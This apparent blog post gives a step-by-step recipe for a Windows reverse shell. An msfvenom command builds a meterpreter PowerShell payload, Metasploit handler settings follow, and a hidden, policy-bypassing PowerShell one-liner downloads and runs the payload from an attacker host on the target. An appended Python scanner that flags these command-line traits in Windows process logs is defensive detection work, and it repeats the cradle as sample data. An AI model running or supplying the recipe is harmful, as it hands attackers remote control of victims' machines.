红炉点雪

PowerShell reverse shell to Metasploit

1. Generate the PS1 file with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=777 -f psh-reflection >777.ps1

2. Start the Metasploit listener:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 777
run

3. Run the following command from cmd on the target machine:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/777.ps1');xx.ps1"

Note whether the target system is 32-bit or 64-bit; the payload architecture (windows/x64/... above) must match it.
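The one-liner in step 3 combines several traits that stand out in process-creation telemetry: a hidden window, an execution-policy bypass, an in-memory download via `Net.WebClient.DownloadString`, and `IEX`. The following is an added example, not code from the original post: a small Python scanner that scores those indicators over constructed log lines imitating the CommandLine field of Windows Security event 4688 / Sysmon event 1. The indicator weights, the threshold, the host `203.0.113.10` and the base64 blob are assumptions chosen for the example.

```python
"""Score PowerShell command lines for download-cradle indicators.

Added example (not part of the original post). The sample events below are
constructed to resemble the CommandLine field of Windows event 4688 or
Sysmon event 1; they are not real telemetry.
"""
import re

# (name, regex, weight). Weights are an assumption for this example,
# not a vendor scoring scheme; the heavier ones are the traits that are
# rarely seen in legitimate administration.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("exec_policy_bypass", re.compile(r"-e(xec|p|xecutionpolicy)?\s+bypass", re.I), 1),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|DownloadData", re.I), 2),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
]

# Assumption: a single weak trait (e.g. "-ExecutionPolicy Bypass -File x.ps1")
# is common in admin scripts; combinations are what we alert on.
THRESHOLD = 3

# Constructed sample events (placeholder host and placeholder base64 content).
SAMPLE_EVENTS = [
    # The one-liner from step 3 of the post, with a documentation-range IP.
    "4688 Parent=cmd.exe CommandLine=powershell -windowstyle hidden -exec bypass "
    "-c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/777.ps1')\"",
    # A benign administrative invocation: bypass alone, no download, no IEX.
    "4688 Parent=explorer.exe CommandLine=powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Encoded-command variant launched from an Office process; blob is a placeholder.
    "4688 Parent=winword.exe CommandLine=powershell -nop -w hidden -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    # Ordinary interactive shell.
    "4688 Parent=explorer.exe CommandLine=powershell.exe",
]


def score_command_line(cmdline):
    """Return (total_weight, [matched indicator names]) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def is_suspicious(cmdline):
    """True when the combined indicator weight reaches THRESHOLD."""
    return score_command_line(cmdline)[0] >= THRESHOLD


def scan_log(lines):
    """Return [(score, hits, line)] for every line that crosses the threshold."""
    findings = []
    for line in lines:
        score, hits = score_command_line(line)
        if score >= THRESHOLD:
            findings.append((score, hits, line))
    return findings


if __name__ == "__main__":
    for score, hits, line in scan_log(SAMPLE_EVENTS):
        print(f"score={score} hits={','.join(hits)}\n  {line}")
```

The scoring is deliberately additive rather than a single regex so that variants the post does not show (an encoded command, `DownloadFile` instead of `DownloadString`) still accumulate enough weight, while a lone `-ExecutionPolicy Bypass` on a scheduled maintenance script stays below the threshold.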
